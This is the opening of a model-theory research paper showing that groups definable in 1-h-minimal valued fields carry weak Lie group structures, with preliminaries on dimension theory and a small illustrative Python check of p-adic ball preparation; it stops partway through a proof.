# On groups and fields definable in \(1\)-h-minimal fields ###### Abstract. We show that an infinite group \(G\) definable in a \(1\)-h-minimal field admits a strictly \(K\)-differentiable structure with respect to which \(G\) is a (weak) Lie group, and show that definable local subgroups sharing the same Lie algebra have the same germ at the identity. We conclude that infinite fields definable in \(K\) are definably isomorphic to finite extensions of \(K\) and that \(1\)-dimensional groups definable in \(K\) are finite-by-abelian-by-finite. Along the way we develop the basic theory of definable weak \(K\)-manifolds and definable morphisms between them. The authors were supported by ISF grants No. 555/21. ## 1. Introduction Various Henselian valued fields are amenable to model theoretic study. Those include the \(p\)-adic numbers (more generally, \(p\)-adically closed fields), and (non-trivially) valued real closed and algebraically closed fields, as well as various expansions thereof (e.g. by restricted analytic functions). Recently, a new axiomatic framework for tame valued fields (of characteristic \(0\)) was introduced. This framework, known as Hensel-minimality1, was suggested in [4] and [5] as a valued field analogue of o-minimality. The notion of \(1\)-h-minimality is both broad and powerful. Known examples include, among others, all pure Henselian valued fields of characteristic \(0\) as well as their expansions by restricted analytic functions. Known tameness consequences of \(1\)-h-minimality include a well-behaved dimension theory, and strong regularity of definable functions (e.g., a generic Taylor approximation theorem for definable functions). Footnote 1: In [4] and [5] various notions of Hensel-minimality – \(n\)-h-minimality – for \(n\in\mathbb{N}\cup\{\omega\}\), were introduced. For the sake of clarity of exposition, we will only discuss \(1\)-h-minimality. In the present paper, we initiate a study of groups definable in \(1\)-h-minimal fields. Using the above mentioned tameness and regularity conditions provided by \(1\)-h-minimality and inspired by similar studies in the o-minimal setting (initiated in [11]) and in \(p\)-adically closed fields ([12]) our first theorem (Proposition 6.4, stated here in a slightly weaker form) is: **Theorem 1**.: _Let \(K\) be a \(1\)-h-minimal field, \(G\) an infinite group definable in \(K\). Then \(G\) admits a definable weak \(\mathcal{C}^{k}\) (any \(k\)) manifold structure with respect to which \(G\) has the structure of a strictly differentiable weak \(\mathcal{C}^{k}\)-Lie group. I.e., the forgetful functor from definable strictly differentiable weak Lie groups to definable groups is an equivalence of categories. If algebraic closure coincides with definable closure in \(K\), then a definable weak Lie group is a definable Lie group._ Above by a definable weak Lie group (over \(K\)) we mean a Lie group whose underlying \(K\)-manifold structure may not have a definable (so, in particular, finite) atlas but can be covered by (the domains of) finitely many compatible etale maps. We do not know whether this is a necessary requirement for the correctness of the statement, or an artifact of the proof: we follow Pillay's argument in the o-minimal and \(p\)-adic contexts ([11], [12]), but the fact that in the present setting finite covers are not generically trivial, requires that we work with weakly definable manifolds, in the above sense. 
To pursue this argument, we have to extend the study of definable functions beyond what was done in [4] (and its sequel). Specifically, instead of working with continuously differentiable functions (as is the case in the o-minimal setting) we are working with strictly differentiable functions, and for those we prove an inverse function theorem, allowing us to deduce an implicit function theorem for definable functions as well as other standard consequences of these theorems. We do not know whether strict differentiability follows in the \(1\)-h-minimal context from continuous differentiability (as is the case in real analysis), but it can be easily inferred from a multi-variable Taylor approximation theorem for definable functions available in this context. Having established that definable groups are Lie, our next theorem establishes the natural Lie correspondence (asserting that the germ of a definable group morphism at the identity is determined by its derivative at that point). For applications it is convenient to state the result for local groups (Corollary 6.11): **Theorem 2**.: _Let \(K\) be a \(1\)-h-minimal field, \(U\) and \(V\) definable strictly differentiable local Lie groups and \(g,f:U\to V\) definable strictly differentiable local Lie group morphisms. If we denote \(Z=\{x\in U:g(x)=f(x)\}\), then \(\dim_{e}Z=\dim(\ker(f^{\prime}(e)-g^{\prime}(e)))\)._ We then prove two applications. First, we show - adapting techniques from the o-minimal context - that every infinite field definable in a \(1\)-h-minimal field, \(K\), is definably isomorphic to a finite extension of \(K\), Proposition 7.3. This generalizes an analogous result for real closed valued fields ([2]) and \(p\)-adically closed fields ([12]). It will be interesting to know whether these results can be extended to _interpretable_ fields (in the spirit of [6] or [9, §6]) under suitable additional assumptions on the RV-sort. Our next application is a proof that definable \(1\)-dimensional groups are finite-by-abelian-by-finite, Corollary 8.10. This generalizes analogous results in the o-minimal context ([11]) and in \(p\)-adically closed fields ([12]), and combines with [1] to give a complete classification of \(1\)-dimensional groups definable in \(\mathrm{ACVF}_{0}\). The present paper is a first step toward the study of groups definable in \(1\)-h-minimal fields. It seems that more standard results on Lie groups over complete local fields can be extended to this context. Thus, for example, it can be shown that any definable local group contains a definable open subgroup. As the proof is long and involves new techniques, we postpone it to a subsequent paper. ### Structure of the paper In Section 2 we review the basics of \(1\)-h-minimality and dimension theory in geometric structures. In Section 3 we prove a multi-variable Taylor approximation theorem for \(1\)-h-minimal fields, and formulate some strong regularity conditions (implied, generically, by Taylor's theorem) that will be needed in later parts of the paper. These results are, probably, known to the experts, and we include them mostly for the sake of completeness and clarity of exposition (as some of them do not seem to exist in writing). In Section 4 we prove the inverse function theorem and related theorems on the local structure of immersions, submersions and constant rank functions. Though some of the proofs are similar to those of analogous statements in real analysis (and, more generally, in the o-minimal context) this is not true throughout.
Specifically, \(1\)-h-minimality is invoked in a crucial way in the proof that a function with vanishing derivative is locally constant, which - in turn - is used in our proof of the Lie correspondence for definable groups. Using the results of the first sections, our study of definable groups starts in Section 6. We first show that definable groups can be endowed with an, essentially unique, strictly differentiable weak Lie group structure, and that the germ of definable group morphisms are determined by their derivative at the identity. We then define the (definable) Lie algebra associated with a definable Lie group, and show that it satisfies the familiar properties of Lie algebras. This is done using a local computation, after characterizing the Lie bracket as the second order part of the commutator function near the identity. Section 7 is dedicated to the classification of fields definable in \(1\)-h-minimal fields, and in Section 8 we prove our results on definable one dimensional groups. ## 2. Preliminaries In this section we set some background definitions, notation and describe basic relevant results, used in later sections. Most of the terminology below is either standard or taken from [4]. Throughout, \(K\) will denote a non-trivially valued field. We will not distinguish, notationally, between the structure and its universe. Formally, we allow \(K\) to be a multi-sorted structure (with all sorts coming from from \(K^{eq}\)), but by a definable set we mean (unless explicitly stated otherwise) a subset of \(K^{n}\) definable with parameters. All tuples are finite, and we write (as is common in model theory) \(a\in K\) for \(a\in K^{n}\) for \(n=\operatorname{length}(a)\). We apply the same convention to variables. To stress the analogy of the current setting with the Real numbers we use multiplicative notation for the valuation. Thus, the valued group is denoted \((\Gamma,\cdot)\) and the valuation \(|\cdot|:K\to\Gamma_{0}=\Gamma\cup\{0\}\), and if \(x\in K^{n}\) we set \(|x|:=\max_{1\leq k\leq n}|x_{k}|\). An open ball of (valuative) radius \(r\in\Gamma\) in \(K^{n}\) is a set of the form \(B=\{x\in K^{n}:|x-a|<r\}\) for \(a\in K^{n}\). The balls endow \(K\) with a field topology (the valuation topology). Up until Section 6 all topological notions mentioned in the text will refer solely to this topology. We denote \(\mathcal{O}:=\{x:|x|\leq 1\}\), the valuation ring, \(\mathcal{M}:=\{x\in\mathcal{O}:|x|<1\}\), the valuation ideal, and \(k:=\mathcal{O}/\mathcal{M}\), the residue field. We also denote \(RV=K^{\times}/1+\mathcal{M}\). More generally, whenever \(s\in\Gamma\) and \(s\leq 1\), we denote \(\mathcal{M}_{s}=\{x\in K:|x|<s\}\), and \(RV_{s}=K^{\times}/1+\mathcal{M}_{s}\). If \(K\) has mixed characteristic \((0,p)\), we denote \(RV_{p,n}=RV_{|p|^{n}}\) and \(RV_{p,\bullet}=\bigcup_{n}RV_{p,n}\). It is convenient, when discussing approximation theorems, to adopt the big-O notation from real analysis. For the sake of clarity we recall this notation in the valued field setting: **Definition 2.1**.: 1. If \(f:U\to K^{m}\) and \(g:U\to\Gamma_{0}\) are functions defined in an open neighborhood of \(0\) in \(K^{n}\), then \(f(x)=O(g(x))\) means that there are \(r,M>0\) in \(\Gamma\) such that if \(|x|<r\) then \(|f(x)|\leq Mg(x)\). We also denote \(f_{1}(x)=f_{2}(x)+O(g(x))\) if \(f_{1}(x)-f_{2}(x)=O(g(x))\). 2. If \(g:U\to K^{r}\), and \(s\in\mathbb{N}\), then \(O(g(x)^{s})=O(|g(x)|^{s})\). 3. 
If \(f:Y\times U\to K^{m}\), is a function where \(U\) is an open neighborhood of \(0\) in \(K^{n}\), and if \(g:U\to\Gamma_{0}\), then \(f(y,x)=O_{y}(g(x))\) means that for every \(y\in Y\), there are \(r_{y},M_{y}>0\), such that if \(|x|<r_{y}\) then \(|f(y,x)|\leq M_{y}g(x)\). As mentioned in the introduction, in the present paper we are working with the notion of strict differentiability, which we now recall: **Definition 2.2**.: Let \(U\subset K^{n}\) be an open subset and \(f:U\to K^{m}\) be a map. Then \(f\) is strictly differentiable at \(a\in U\) if there is a linear map \(A:K^{n}\to K^{m}\) such that for every \(\epsilon>0\), there exists \(\delta>0\) satisfying \(|f(x)-f(y)-A(x-y)|\leq\epsilon|x-y|\) for every \(x,y\) such that \(|x-a|<\delta\) and \(|y-a|<\delta\). \(f\) is strictly differentiable in \(U\) if it is strictly differentiable at every point of \(U\). In the situation of the definition the linear map \(A\) is uniquely determined and denoted \(f^{\prime}(a)\). If \(f\) is strictly differentiable in an open \(U\), then it is continuously differentiable. **Definition 2.3**.: Let \(U\subset K^{n}\) and \(V\subset K^{n}\) be open subsets. Then \(f:U\to V\) is a strict diffeomorphism if it is strictly differentiable, bijective and its inverse is strictly differentiable. As we will see, a strict diffeomorphism is just a strictly differentiable diffeomorphism. Given an open ball \(B\subseteq K^{n}\) of radius \(r\), a subset \(Y\) of \(K^{n}\), and an element \(s\in\Gamma\) with \(s\leq 1\), we say that \(B\) is \(s\)-next to \(Y\) if \(B^{\prime}\cap Y=\emptyset\) for \(B^{\prime}\) the open ball of radius \(s^{-1}r\) containing \(B\). Note that every point not in the closure of \(Y\) is contained in a ball \(s\)-next to \(Y\). This is because if \(B\) is an open ball of radius \(r\) disjoint from \(Y\), then every open ball of radius \(sr\) contained in \(B\) is \(s\)-next to \(Y\). Following [4] we say that a finite set \(Y\subset K\) prepares the set \(X\subset K\), if for every ball, \(B\), disjoint from \(Y\) is either disjoint from \(X\) or contained in \(X\). More generally, if \(s\in\Gamma\) is such that \(s\leq 1\), then \(Y\)\(s\)-prepares \(X\) if every open ball \(B\)\(s\)-next to \(Y\) is either contained in \(X\) or disjoint from \(X\). If \(K\) is a valued field of mixed characteristic \((0,p)\), given an integer \(m\in\mathbb{N}\), an open ball, \(B\subseteq K^{n}\), and a set \(Y\subseteq K^{n}\), we say that \(B\) is \(m\)-next to \(Y\) if it is \(|p|^{m}\)-next to \(Y\). Similarly, if \(s\in\Gamma\) and \(s\leq 1\) then \(B\) is \(m\)-\(s\)-next to \(Y\) if it is \(|p|^{m}s\)-next to \(Y\). Given a finite \(Y\subset K\) and \(X\subset K\), we say that \(Y\)\(m\)-prepares (resp. \(m\)-\(s\)-prepares) the set \(X\) if \(Y\)\(|p|^{m}\)-prepares \(X\) (resp. \(Y\)\(|p|^{m}s\)-prepares \(X\)). Next, we recall the definitions of 1-h-minimality defined in the equi-characteristic \(0\) ([4]) and in mixed characteristic ([5]) settings: **Definition 2.4**.: Let \(K\) be an \(\aleph_{0}\)-saturated non-trivially valued field of characteristic \(0\), which is a structure in a language extending the language of valued fields. 1. If \(K\) has residue characteristic \(0\) then \(K\) is \(1\)-h-minimal, if for any \(s\leq 1\) in \(\Gamma\) any \(A\subseteq K\), \(A^{\prime}\in RV_{s}\) (a singleton) and every \((A\cup RV\cup A^{\prime})\)-definable set \(X\subset K\), there is an \(A\)-definable finite set \(Y\subset K\)\(s\)-preparing \(X\). 2. 
If \(K\) has mixed characteristic \((0,p)\) then \(K\) is \(1\)-h-minimal, if for any \(s\leq 1\) in \(\Gamma\) any \(A\subseteq K\), \(A^{\prime}\in RV_{s}\) (a singleton) and every \((A\cup RV_{p,\bullet}\cup A^{\prime})\)-definable set \(X\subset K\), there are \(m\in\mathbb{N}\) and an \(A\)-definable finite set \(Y\subset K\) which \(m\)-\(s\)-prepares \(X\). In the sequel, when appealing directly to the definition, we will only need the case \(s=1\) (so \(A^{\prime}\) does not appear). The parameter \(s\) does appear implicitly, though, when applying properties of \(1\)-h-minimality such as generic continuity of definable functions (see [4, Proposition 5.1.1]). Below we will need to study properties of "one-to-finite definable functions" (definable correspondences, in the terminology of [15]). It turns out that statements regarding such objects can sometimes be reduced to statements on definable functions in expansions of the language by algebraic Skolem functions (i.e., Skolem functions for definable finite sets). For this, the following will be convenient (see [4, Proposition 4.3.3], and [5, Proposition 3.2.2]): **Fact 2.5**.: _Suppose \(K\) is a 1-h-minimal valued field. Then there exists a language \(\mathcal{L}^{\prime}\supseteq\mathcal{L}\), an elementary extension \(K^{\prime}\) of \(K\), and an \(\aleph_{0}\)-saturated \(\mathcal{L}^{\prime}\)-structure on \(K^{\prime}\) extending the \(\mathcal{L}\)-structure of \(K^{\prime}\), such that \(K^{\prime}\) is 1-h-minimal as an \(\mathcal{L}^{\prime}\)-structure, and such that \(\operatorname{acl}_{\mathcal{L}^{\prime}}(A)=\operatorname{dcl}_{\mathcal{L}^{\prime}}(A)\) for all \(A\subseteq K^{\prime}\)._ Above and throughout, algebraic and definable closures are always assumed to be taken in the \(K\) sort. In the sequel we will refer to the property appearing in the conclusion of Fact 2.5 simply as "\(\operatorname{acl}=\operatorname{dcl}\)". **Remark 2.6**.: Given an \(\mathcal{L}\)-definable set, \(S\), statements concerning topological or geometric properties of \(S\) are often expressible by first-order \(\mathcal{L}\)-formulas. As the topology on \(K\) is definable in the valued field language, and the dimension of definable sets in a \(1\)-h-minimal structure is determined by the topology (see Proposition 2.11), the truth values of the hypothesis and conclusion of such statements (for our fixed \(\mathcal{L}\)-definable set \(S\)) are the same in \(K\) and in any elementary extension \(K\prec K^{\prime}\), as well as in any \(1\)-h-minimal expansion of the latter. Therefore, by Fact 2.5, in the proof of such statements (for a fixed definable \(S\)) there is no harm assuming \(\operatorname{acl}=\operatorname{dcl}\). ### Geometric structures Geometric structures were introduced in [8, §2]. Let us recall the definition: An \(\aleph_{0}\)-saturated structure, \(M\), is _pregeometric_ if \(\operatorname{acl}(\cdot)\) is a matroid, that is, it satisfies the exchange property: \[\text{if }a\in\operatorname{acl}(Ab)\setminus\operatorname{acl}(A),\text{ then }b\in \operatorname{acl}(Aa)\text{ for singletons }a,b\in M.\] In this situation the matroid gives a notion of dimension, \(\dim(a/b)\), the dimension of a tuple \(a\) over a tuple \(b\) as the smallest length of a sub-tuple \(a^{\prime}\) of \(a\) such that \(a\in\operatorname{acl}(a^{\prime}b)\), and the dimension of a \(b\)-definable set \(X\) as the maximum of the dimensions \(\dim(a/b)\) with \(a\in X\) (this does not depend on \(b\)).
As is customary, we set \(\dim(\emptyset)=-\infty\). We recall the basic properties of dimension (see [8, SS2] for all references). This dimension satisfies the additivity property \[\dim(ab/c)=\dim(a/bc)+\dim(b/c),\] that we will invoke without further reference. We call \(a\) and \(b\) algebraically independent over \(c\) if \(\dim(a/bc)=\dim(a/c)\). Note that by additivity of dimension this is a symmetric relation. Note also that additivity implies that if \(b,c\) are inter-algebraic over \(a\), meaning \(b\in\operatorname{acl}(ac)\) and \(c\in\operatorname{acl}(ab)\), then \(\dim(b/a)=\dim(c/a)\) (in particular, this holds when \(c\) is the image of \(b\) under an \(a\)-definable bijection). If \(M\) is a pregeometric structure and \(f:X\to Y\) is a surjective definable function with fibers of constant dimension \(k\), then \(\dim(X)=\dim(Y)+k\). This is a consequence of the additivity formula. Given an \(a\)-definable set \(X\), a generic element of \(X\) over \(a\) is an element \(b\in X\) such that \(\dim(b/a)=\dim(X)\). By compactness generic elements can always be found in saturated enough models. We call \(Y\subset X\) large if \(\dim(X\setminus Y)<\dim(X)\). This is equivalent to \(Y\) containing every generic point of \(X\). A pregeometric structure, \(M\), eliminating the quantifier \(\exists^{\infty}\) is called geometric. If \(M\) is geometric dimension is definable in definable families. Namely, for \(\{X_{a}\}_{a\in S}\), a definable family, the set \(\{a\in S:\dim(X_{a})=k\}\) is definable. The following simple fact is a translation of the definition of a pregeometry to a property of definable sets. Note as an aside that this reformulation implies that the property of being a pregeometry is preserved under reducts. I.e., if \(M\) is an \(\aleph_{0}\)-saturated pregeometric \(\mathcal{L}^{\prime}\)-structure, and \(\mathcal{L}\subset\mathcal{L}^{\prime}\), then \(M\) is also a pregeometric \(\mathcal{L}\)-structure. For the sake of completeness, we give the proof: **Fact 2.7**.: _Suppose \(M\) is an \(\aleph_{0}\)-saturated structure. Then \(M\) is pregeometric if and only if for every definable \(X\subset M\times M\) if the projection, \(\pi_{1}:X\to M\), into the first factor is finite-to-one, and \(\pi_{2}:X\to M\) is the projection into the second factor, then the set \(Y=\{c\in M:\pi_{2}^{-1}(c)\cap X\text{ is infinite}\}\) is finite._ Proof.: Suppose \(M\) is pregeometric and suppose \(X\subset M\times M\) is \(A\)-definable such that \(\pi_{1}^{-1}(x)\cap X\) is finite for all \(x\in M\). Suppose also that \(Y=\{y\in M:\pi_{2}^{-1}(y)\cap X\text{ is infinite}\}\) is infinite. By compactness and saturation, we can choose \(b\in Y\) such that \(\dim(b/A)=1\). Similarly, we can find \(a\in\pi_{2}^{-1}(b)\cap X\) such that \(\dim(a/Ab)=1\). We conclude that \(\dim(ab/A)=2\), and so \(\dim(X)\geq 2\). This contradicts the fact that \(\pi_{1}^{-1}(x)\cap X\) is finite for all \(x\in M\). For the converse, suppose \(A\) is a finite subset of \(M\) and \(a,b\in M\) are singletons such that \(a\in\operatorname{acl}(Ab)\setminus\operatorname{acl}(A)\). Then there is an \(A\)-definable set \(X\subset M\times M\) such that \((b,a)\in X\) and \(\pi_{1}^{-1}(b)\cap X\) is finite, say of cardinality \(k\). If we take \(Z=\{c\in M:\pi_{1}^{-1}(c)\cap X\text{ has cardinality }k\}\), then we may replace \(X\) by \(X\cap Z\times M\), and we may assume that \(\pi_{1}^{-1}(c)\cap X\) is either empty or of constant finite cardinality for all \(c\in M\). 
In this case, by the hypothesis we conclude that \(Y=\{y\in M:\pi_{2}^{-1}(y)\cap M\text{ is infinite}\}\) is finite. Note that \(Y\) is \(A\)-invariant and definable, so it is \(A\)-definable. We conclude that \(a\notin Y\), because \(a\notin\operatorname{acl}(A)\), and so \(b\in\operatorname{acl}(Aa)\) as required. The next characterization of the \(\operatorname{acl}\)-dimension should be well known: **Fact 2.8**.: _Suppose \(M\) is an \(\aleph_{0}\)-saturated structure, which eliminates the \(\exists^{\infty}\) quantifier. Suppose there is a function, \(X\mapsto d(X)\), from the non-empty definable subsets of (cartesian powers of) \(M\) into \(\mathbb{N}\) satisfying:_ 1. _If_ \(X\subset M^{n}\times M\) _is such that the first coordinate projection_ \(\pi_{1}:X\to M^{n}\) _is finite to one, then_ \(d(X)=d(\pi_{1}(X))\)_._ 2. _If_ \(X\subset M^{n}\times M\) _is such that the first coordinate projection_ \(\pi_{1}:X\to M^{n}\) _has infinite fibers, then_ \(d(X)=d(\pi_{1}(X))+1\)_._ 3. _If_ \(\pi:M^{n}\to M^{n}\) _is a coordinate permutation, then_ \(d(X)=d(\pi(X))\) _ 4. \(d(X\cup Y)=\max\{d(X),d(Y)\}\)_._ 5. \(d(M)=1\)__ 6. \(d(X)=0\) _if and only if_ \(X\) _is finite._ _Then \(M\) is a geometric structure and \(d\) coincides with its \(\operatorname{acl}\)-dimension._ Proof.: It suffices to show that \(M\) is pregeometric. We use Fact 2.7. Let \(X\subset M\times M\) be such that \(\pi_{1}^{-1}(x)\cap X\) is finite for all \(x\in M\). Take \(Y=\{y\in M:\pi_{2}^{-1}(y)\cap X\text{ is infinite}\}\). Because \(M\) eliminates the \(\exists^{\infty}\) quantifier we have that \(Y\) is definable. If \(Y\) is infinite we conclude that \(d(X)\geq d(X\cap\pi_{2}^{-1}(Y))=d(Y)+1=2\). The first inequality by item (4), the second equality by items (3) and (2), and the third by item (6). On the other hand \(d(X)=d(\pi_{1}(X))\leq d(M)=1\), the first equality by item (1), the second inequality by item (4) and the third by item (5). This is a contradiction and finishes the proof. In order to see that \(d(X)=\dim(X)\) for \(X\subset M^{n}\) we may proceed by induction on \(n\). The base case \(n=1\) follows from item (4), (5) and (6). So suppose that \(X\subset M^{n}\times M\). Denote \(Y=\{x\in M^{n}:\pi_{1}^{-1}(x)\cap X\text{ is infinite}\}\). By hypothesis \(Y\) is a definable set. Denote \(X_{1}=\pi_{1}^{-1}(Y)\cap X\) and \(X_{2}=X\setminus X_{1}\). Then by items (1),(2) and (4) we conclude that \(d(X)=\max\{d(X_{1}),d(X_{2})\}=\max\{d(Y)+1,d(\pi_{1}(X)\setminus Y)\}\). For the same reason we have the formula \(\dim(X)=\max\{\dim(Y)+1,\dim(\pi_{1}(X)\setminus Y)\}\), so \(d(X)=\dim(X)\) as required. The next fact is also standard: **Fact 2.9**.: _Suppose \(M\) is a geometric structure. Suppose \(X\subset M^{n}\) is \(a\)-definable. Then there is a partition of \(X\) into a finite number of \(a\)-definable sets \(X=X_{1}\cup\dots\cup X_{n}\), such that for each member of the partition \(X_{k}\), there is a coordinate projection \(\pi:X_{k}\to M^{r}\) which is finite to one and has image of dimension \(r\)._ **Remark 2.10**.: For this statement we need to allow the identity \(\operatorname{id}:M^{n}\to M^{n}\) as a coordinate projection. Also, recall that \(M^{0}\) is a set consisting of one element. For this statement we also need to allow the constant function \(M^{n}\to M^{0}\) as a coordinate projection. Proof.: By induction on the dimension of the ambient space \(n\). Consider the projection onto the first \(n-1\) coordinates \(\pi_{1}:M^{n}\to M^{n-1}\). 
Then the set \(Y\subset M^{n-1}\) of \(y\) such that the fibers \(X_{y}=\pi_{1}^{-1}(y)\cap X\) are infinite is definable. So partitioning \(X\) we may assume all the nonempty fibers of \(X\) over \(M^{n-1}\) are finite, or all are infinite. If all the fibers of \(X\to K^{n-1}\) are finite then we finish by induction. If all the nonempty fibers are infinite then by the induction there is a partition \(Y=\bigcup_{i}Y_{i}\) and for each \(Y_{i}\) there is a coordinate projection \(\tau:Y_{i}\to K^{r}\) with finite fibers and \(r=\dim(Y_{i})\). Denote \(\pi_{2}:M^{n}\to M\) the projection onto the last coordinate. Then setting \(X_{i}=X\cap\pi_{1}^{-1}(Y_{i})\), the projection \(\pi(x)=(\tau(\pi_{1}(x)),\pi_{2}(x))\) has the desired properties. The next proposition is key. It asserts that \(1\)-h-minimal fields are geometric, and it connects (combined with the previous fact) topology and dimension in such structures: **Proposition 2.11**.: _Suppose \(K\) is a 1-h-minimal valued field. Then:_ 1. \(K\) _is a geometric structure._ _._ 2. _Every_ \(X\subset K^{n}\) _satisfies_ \(\dim(X)=n\) _if and only if_ \(X\) _has nonempty interior. Every_ \(X\subset K^{n}\) _satisfies_ \(\dim(X)<n\) _if and only if_ \(X\) _is nowhere dense._ 3. _For_ \(X\subset K^{n}\)_, we have_ \(\dim(X)=\max_{x\in X}\dim_{x}(X)\)_, where we denote_ \(\dim_{x}(X)\) _the local dimension of_ \(X\) _at_ \(x\)_, defined as_ \(\dim_{x}(X)=\min\{\dim(B\cap X):x\in B\text{ is an open ball}\}\)__ Proof.: This is essentially items (1)-(5) of [4, Proposition 5.3.4] in residue characteristic \(0\) and contained in [5, Proposition 3.1.1] in mixed characteristic. For example, assume \(K\) has residue characteristic \(0\). That \(K\) is geometric is proved in the course of the proof of [4, Proposition 5.3.4]. We can also derive it from Fact 2.8 and [4, Proposition 5.3.4]. The topological characterization \(\dim(X)=n\) if and only if \(X\) has nonempty interior, is a particular case of item (1) in [4, Proposition 5.3.4]. That \(\dim(X)<n\) if and only if \(X\) is nowhere dense follows from this. Indeed, if \(\dim(X)=n\), then \(X\) has nonempty interior and so it is not nowhere dense. If \(\dim(X)<n\) and \(U\subset K^{n}\) is nonempty open, then \(\dim(U\setminus X)=n\), and so \(U\setminus X\) has nonempty interior. This implies \(X\) is nowhere dense. That dimension is the maximum of the local dimensions is item (5) of Proposition 5.3.4 of [4] **Proposition 2.12**.: _Suppose \(K\) is a 1-h-minimal field. Suppose \(f:U\to K^{m}\) is a definable function. Then there is a definable open dense subset \(U^{\prime}\subset U\) such that \(f:U^{\prime}\to K^{m}\) is continuous._ Proof.: This is essentially a particular case of [4, Proposition 5.1.1] in residue characteristic \(0\), and contained in [5, Proposition 3.1.1] in mixed characteristic. Indeed, because the intersection of open dense sets is open and dense we reduce to the case \(m=1\). From those propositions one gets that the set \(Z\) of points where \(f\) is continuous is dense in \(U\). As \(Z\) is not nowhere dense we conclude using item (2) of Proposition 2.11 that \(\dim(Z)=n\) and so \(Z\) has nonempty interior. If \(V\subset U\) is a nonempty open definable subset then, as \(Z\cap V\) is the set of points at which \(f|_{V}\) is continuous, by what we just proved \(Z\cap V\) has nonempty interior. We conclude that the set of points at which \(f\) is continuous has a dense interior in \(U\), as desired. 
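Since the ball combinatorics used throughout this section can be easier to parse in a concrete field, here is a small self-contained Python sketch over \(\mathbb{Q}\) equipped with the \(5\)-adic absolute value (one special case of the valued fields under consideration); the helper functions are ours and purely illustrative. It spot-checks the preparation phenomenon recalled above: the finite set \(C=\{0\}\) prepares \(\mathcal{M}=\{x:|x|<1\}\), because any open ball disjoint from \(\{0\}\) has constant absolute value by the ultrametric inequality, hence is contained in \(\mathcal{M}\) or disjoint from it.

```python
from fractions import Fraction

P = 5  # a fixed prime; we work in Q with the 5-adic absolute value

def absp(x) -> Fraction:
    """Multiplicative p-adic absolute value |x| = P^(-v_P(x)), with |0| = 0."""
    x = Fraction(x)
    if x == 0:
        return Fraction(0)
    v, num, den = 0, x.numerator, x.denominator
    while num % P == 0:
        num //= P
        v += 1
    while den % P == 0:
        den //= P
        v -= 1
    return Fraction(1, P) ** v

def in_open_ball(x, center, radius) -> bool:
    """Membership in the open ball {x : |x - center| < radius}."""
    return absp(Fraction(x) - Fraction(center)) < radius

# Spot-check: C = {0} prepares M = {x : |x| < 1}.  For a != 0, the open ball of
# radius |a| around a misses 0, and by the ultrametric inequality every x in it
# satisfies |x| = |a|; so the ball lies inside M (if |a| < 1) or is disjoint from M.
samples = [Fraction(n, d) for n in range(-12, 13) if n for d in (1, 2, 3, 5, 25)]
for a in samples:
    radius = absp(a)                      # largest open radius keeping 0 outside
    statuses = {absp(x) < 1 for x in samples if in_open_ball(x, a, radius)}
    assert len(statuses) == 1, f"ball around {a} would be split by M"
print("every sampled ball disjoint from {0} is contained in M or disjoint from M")
```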
Next we describe a topology for \(Y^{[s]}\), the set of subsets of \(Y\) of cardinality \(s\), for \(Y\) a Hausdorff topological space, and \(s\) a positive integer. We prove a slightly more general statement that will be applied when \(X\) is \(Y^{s}\setminus\Delta\), the set of tuples of \(Y^{s}\) with distinct coordinates and the symmetric group, \(S_{s}\), on \(s\) elements acting on \(Y^{s}\) by coordinate permutation, in which case the orbit space is identified with \(Y^{[s]}\). **Fact 2.13**.: _Suppose \(X\) is a Hausdorff topological space, and \(G\) a finite group acting on \(X\) by homeomorphisms, and such that every \(x\in X\) has a trivial stabilizer in \(G\). Then \(X/G\) equipped with the quotient topology is Hausdorff and the map \(p:X\to X/G\) is a closed finite covering map. In fact for every \(x\in X\) there is an open set \(x\in U\subset X\) such that \(\{gU:g\in G\}\) are pairwise disjoint, \(p^{-1}p(U)=\bigcup_{g}gU\) and \(p|_{gU}\) is a homeomorphism onto \(p(U)\)._ Proof.: We know that \(p\) is open, since \(p^{-1}p(U)=\bigcup_{g\in G}gU\) is open for \(U\) open. Consider the orbit \(\{gx\}_{g\in G}\) of \(x\). By assumption, if \(g\neq h\), then \(gx\neq hx\). Let \(V\) be an open set in \(X\) containing \(\{gx\}_{g\in G}\). Now, because \(X\) is Hausdorff, we conclude that there are \(U_{g}\) open neighborhoods of \(gx\), contained in \(V\), such that \(U_{g}\cap U_{h}=\emptyset\) for \(g\neq h\). If we take \(U=\bigcap_{g\in G}g^{-1}U_{g}\), then and so \(\{gU:g\in G\}\) are pairwise disjoint. We conclude that \(p\) is closed and restricted to \(gU\) is a homeomorphism. That \(X/G\) is Hausdorff now follows from this. Indeed, if \(p(x)\neq p(y)\), then there are open sets \(V_{1}\) and \(V_{2}\) of \(X\), which are disjoint and such that \(p^{-1}p(x)\subset V_{1}\) and \(p^{-1}p(y)\subset V_{2}\). Because \(p\) is closed there are open sets \(p(x)\in U_{1}\) and \(p(y)\in U_{2}\) in \(X/G\) such that \(p^{-1}(U_{i})\subset V_{i}\). We conclude that \(U_{1}\) and \(U_{2}\) are disjoint. **Proposition 2.14**.: _Let \(K\) be a 1-h-minimal valued field. Suppose \(U\subset K^{n}\) is open and \(f:U\to(K^{r})^{[s]}\) is definable. Then there is an open dense definable set \(U^{\prime}\subset U\) such that \(f\) is continuous in \(U^{\prime}\)._ Proof.: This statement is equivalent to saying that the interior of the set of points on which \(f\) is continuous is dense. As this property is expressible by a first order formula we may assume \(\mathrm{acl}=\mathrm{dcl}\), see Fact 2.5 and the remark following it. In that case we have a definable section \(s:(K^{r})^{[s]}\to K^{rs}\), and if \(V\subseteq U\) is open dense such that \(sf\) is continuous, as provided by Proposition 2.12, then \(f\) is continuous in \(V\). **Proposition 2.15**.: _Suppose \(X\subset K^{n}\) is \(b\)-definable. Then there is finite partition of \(X\) into \(b\)-definable sets, such that for each element \(Y\) of the partition there is a coordinate projection \(\pi:Y\to U\) onto an open set \(U\subset K^{m}\), such that the fibers of \(\pi\) all have the same cardinality equal to \(s\), and the associated map \(f:U\to(K^{n-m})^{[s]}\) is continuous._ **Remark 2.16**.: As in Remark 2.10, we need to allow the two cases \(m=0\) and \(m=n\). The set \(K^{0}\) consists of a single point, and has a unique topology. Proof.: This is a consequence of dimension theory and the previous observation. In more detail, we proceed by induction on the dimension of \(X\). 
